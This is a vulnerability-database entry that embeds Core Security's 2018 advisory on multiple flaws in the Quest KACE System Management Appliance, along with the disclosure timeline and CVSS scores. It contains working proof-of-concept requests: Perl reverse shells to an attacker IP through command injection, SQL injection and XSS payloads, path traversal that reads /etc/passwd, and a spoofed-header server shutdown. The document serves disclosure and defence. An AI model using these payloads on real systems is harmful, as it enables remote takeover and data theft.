/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0598",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11138"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11138",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11138",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-10907",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11138",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11138",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-10907",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1216",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-11138",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. A command injection vulnerability exists in the \u0027/common/download_agent_installer.php\u0027 script in QuestKACESystemManagementAppliance8.0.318. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext 